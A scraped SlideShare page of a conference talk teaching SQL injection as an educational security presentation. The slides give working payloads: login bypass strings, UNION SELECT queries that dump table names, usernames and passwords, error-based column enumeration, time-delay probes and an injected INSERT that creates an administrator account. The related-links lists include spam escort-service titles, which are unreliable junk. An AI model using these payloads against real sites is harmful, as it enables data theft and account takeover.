SlideShare une entreprise Scribd logo

How did i steal your database CSCamp2011

Télécharger en tant que PPTX, PDF
Mostafa Siraj
Mostafa Siraj
Technologie
1  sur  72
How Did I Steal Your Database Mostafa Siraj Application Security Expert
DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
Nearly all applications rely on a Datastore
What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
Injection in Search Fields 35
Entering Normal Input
Search Results
Trying Single Quote
I receive this error Error states that it’s
Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
I’m having an error, it’s not
Is it Note: string concatenation in Oracle is ||
Different error, still not
Is it Note: string concatenation in MySQL is blank space
It’s
The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
1. Get number of items after the SELECT statement
Error
Try another number
Result Why the results are less?
Try another number
Error, it’s not 8
Let’s try 7
Result How many columns do we have in the SELECT statement
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Result
Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
Result
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
Injection with errors
Gives me an Error
Getting version ' and 1 in (SELECT @@version)--
Gives me this error
Getting Column names
I get this Error
Getting next column name ' group by login.firstname having 1=1--
I get this error
Again ' group by login.firstname, login.surname having 1=1--
Error reveals new column name
Again ' group by login.firstname, login.surname,login.username having 1=1--
New column name
Continue…
Continue…
Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
Not all Injections generate errors
DEMOSQLMap
You Were GREAT Audience
Thank You @mostafasiraj Mostafa Siraj

Recommandé

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RFayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commandsBalqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql aliasVivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basicwali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsSvetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query ThrowdownKarwin Software Solutions LLC
 

Recommandé

Sql Injection Tutorial!
Sql Injection Tutorial!Sql Injection Tutorial!
Sql Injection Tutorial!ralphmigcute
 
TAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RTAO Fayan_Report on Top 10 data mining algorithms applications with R
TAO Fayan_Report on Top 10 data mining algorithms applications with RFayan TAO
 
Lab2 ddl commands
Lab2 ddl commandsLab2 ddl commands
Lab2 ddl commandsBalqees Al.Mubarak
 
IR SQLite Session #1
IR SQLite Session #1IR SQLite Session #1
IR SQLite Session #1InfoRepos Technologies
 
Sql alias
Sql aliasSql alias
Sql aliasVivek Singh
 
MS SQL Database basic
MS SQL Database basicMS SQL Database basic
MS SQL Database basicwali1195189
 
Dev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsDev Concepts: Data Structures and Algorithms
Dev Concepts: Data Structures and AlgorithmsSvetlin Nakov
 
Recursive Query Throwdown
Recursive Query ThrowdownRecursive Query Throwdown
Recursive Query ThrowdownKarwin Software Solutions LLC
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0michelemanzotti
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methodsJayanthiNeelampalli
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databasesTriad Square InfoSec
 
Creating a database
Creating a databaseCreating a database
Creating a databaseRahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingnonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Edureka!
 
บทที่4
บทที่4บทที่4
บทที่4Waritsara Sonchan
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHPhamsa nandhini
 
Sq linjection
Sq linjectionSq linjection
Sq linjectionMahesh Gupta (DBATAG) - SQL Server Consultant
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECSUptech
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSgaurav koriya
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09sasa_eldoby
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Atsushi Odagiri
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
ApachepoitutorialSrikrishna k
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-cDhirendra Chauhan
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configurationMehdi jannati
 
Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfTamiratDejene1
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1iccma
 

Contenu connexe

Tendances

Creating a database
Creating a databaseCreating a database
Creating a databaseRahul Gupta
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlChema Alonso
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)SqliChema Alonso
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingnonlinear creations
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingChema Alonso
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Edureka!
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHPhamsa nandhini
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECSUptech
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSgaurav koriya
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Atsushi Odagiri
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configurationMehdi jannati
 

Tendances (20)

Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Namespace and methods
Namespace and methodsNamespace and methods
Namespace and methods
 
Xpath injection in XML databases
Xpath injection in XML databasesXpath injection in XML databases
Xpath injection in XML databases
 
Creating a database
Creating a databaseCreating a database
Creating a database
 
ShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)SqlShmooCon 2009 - (Re)Playing(Blind)Sql
ShmooCon 2009 - (Re)Playing(Blind)Sql
 
Playing With (B)Sqli
Playing With (B)SqliPlaying With (B)Sqli
Playing With (B)Sqli
 
Sitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testingSitecore 7: A developers quest to mastering unit testing
Sitecore 7: A developers quest to mastering unit testing
 
Asegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File DownloadingAsegúr@IT IV - Remote File Downloading
Asegúr@IT IV - Remote File Downloading
 
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
Java Collections | Collections Framework in Java | Java Tutorial For Beginner...
 
บทที่4
บทที่4บทที่4
บทที่4
 
Introduction to MySQL in PHP
Introduction to MySQL in PHPIntroduction to MySQL in PHP
Introduction to MySQL in PHP
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Generics. PECS
Generics. PECSGenerics. PECS
Generics. PECS
 
ALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMSALL ABOUT SQL AND RDBMS
ALL ABOUT SQL AND RDBMS
 
plsql Les09
plsql Les09 plsql Les09
plsql Les09
 
Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術Sqlalchemy sqlの錬金術
Sqlalchemy sqlの錬金術
 
Apachepoitutorial
ApachepoitutorialApachepoitutorial
Apachepoitutorial
 
V18 alias-c
V18 alias-cV18 alias-c
V18 alias-c
 
Fluent api configuration
Fluent api configurationFluent api configuration
Fluent api configuration
 

Similaire à How did i steal your database CSCamp2011

Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfTamiratDejene1
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1iccma
 
Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1Syed Asrarali
 
My SQL Skills Killed the Server
My SQL Skills Killed the ServerMy SQL Skills Killed the Server
My SQL Skills Killed the ServerdevObjective
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv OwaspAung Khant
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.pptHastavaramDineshKuma
 
Sql Basics | Edureka
Sql Basics | EdurekaSql Basics | Edureka
Sql Basics | EdurekaEdureka!
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standardsAlessandro Baratella
 
Advanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxAdvanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxEllenGracePorras
 

Similaire à How did i steal your database CSCamp2011 (20)

Chapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdfChapter – 6 SQL Lab Tutorial.pdf
Chapter – 6 SQL Lab Tutorial.pdf
 
Intro To TSQL - Unit 1
Intro To TSQL - Unit 1Intro To TSQL - Unit 1
Intro To TSQL - Unit 1
 
Intro to tsql unit 1
Intro to tsql unit 1Intro to tsql unit 1
Intro to tsql unit 1
 
Oracle notes
Oracle notesOracle notes
Oracle notes
 
Sql injection
Sql injectionSql injection
Sql injection
 
Hira
HiraHira
Hira
 
Sql injection
Sql injectionSql injection
Sql injection
 
Oracle Notes
Oracle NotesOracle Notes
Oracle Notes
 
My SQL Skills Killed the Server
My SQL Skills Killed the ServerMy SQL Skills Killed the Server
My SQL Skills Killed the Server
 
Sql killedserver
Sql killedserverSql killedserver
Sql killedserver
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql Injection Adv Owasp
Sql Injection Adv OwaspSql Injection Adv Owasp
Sql Injection Adv Owasp
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
3 database-jdbc(1)
3 database-jdbc(1)3 database-jdbc(1)
3 database-jdbc(1)
 
98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt98765432345671223Intro-to-PostgreSQL.ppt
98765432345671223Intro-to-PostgreSQL.ppt
 
Introduction to database
Introduction to databaseIntroduction to database
Introduction to database
 
Dbms sql-final
Dbms sql-finalDbms sql-final
Dbms sql-final
 
Sql Basics | Edureka
Sql Basics | EdurekaSql Basics | Edureka
Sql Basics | Edureka
 
Database development coding standards
Database development coding standardsDatabase development coding standards
Database development coding standards
 
Advanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptxAdvanced Database Systems - Presentation 3.pptx
Advanced Database Systems - Presentation 3.pptx
 

Dernier

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 

Dernier (20)

Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 

How did i steal your database CSCamp2011

  • 1. How Did I Steal Your Database Mostafa Siraj Application Security Expert
  • 2. DISCLAIMER Hacking websites is ILLEGAL This presentation is meant for educational purposes ONLY Only use this stuff on YOUR website and YOUR account
  • 3. Nearly all applications rely on a Datastore
  • 4. What is Database A Collection of Tables (Users, Orders, Countries,..etc) The tables are a collection of columns/rows
  • 5. What is SQL A query language that allows interacting with the database SQL can Retrieve data from the database Insert new records in the database Delete records from the database Update records in the database
  • 6. SQL Queries To get all data about Username elprince: SELECTUsername,Password, First_Name,Last_Name, Password FROM Users WHERE Username=‘elprince’ Gives a result:
  • 7. FACT Amongst Codd's rules for a Relational Database: Metadata must be stored in the database just as regular data is
  • 8. SQL Injection is a technique where an attacker creates or alters existing SQL commands Expose hidden data (e.g. steal all the records from the tables) Override the data (e.g. Administrators password) Execute dangerous system level commands on the database host
  • 9. SQL Injection Login Example SELECT * FROM Users WHERE Username=‘username’AND Password=‘password’ If the user entered Elprince, Elprince123the query will be SELECT * FROM Users WHERE Username=‘Elprince’AND Password=‘Elprince123’
  • 10. SQL Injection Ex Cont Suppose the User entered ‘ OR 1=1--, 123 the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--’ AND Password=‘123’ -- comments everything afterwards, so the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1--
  • 11. This is not enough You can enhance the injection to login with the administrator account Enter ‘ or 1=1 ORDER BY 1--, abc the query will be SELECT * FROM Users WHERE Username=‘‘ OR 1=1 ORDER BY 1--’ AND Password=‘123’
  • 12. Finding SQL Injection Bugs Submit single quotation mark and observe the result Submit two single quotations and observe the result
  • 13. Finding SQL Injection Bugs For multistate processes, complete all the states before observing the results For search fields try using the wildcard character %
  • 14. Finding SQL Injection Bugs For numeric data, if the original value was 2 try submitting 1+1 or 3-1 If successful try using SQL-specific keywords, e.g. 67-ASCII(‘A’) If single quotes are filtered try 51-ASCII(1) [note ASCII(1)=49]
  • 15. Identify the database engine The error messages will let us know the DB engine We can guess the DB based on OS or Web Server (e.g. LAMP: Linux+Apache+PHP+….)
  • 16. Identify the database engine Use specific characters or commands: String concatenation in different DB engines : ‘||’FOO : ‘+’FOO : ‘‘FOO [note the space btw the 2 quotes]
  • 17. Identify User privileges ‘ and 1 in (SELECTuser) -- ‘; IF user=‘admin’ WAITFOR DELAY ‘0:0:10’--
  • 18. Injection in Search Fields 35
  • 22. I receive this error Error states that it’s
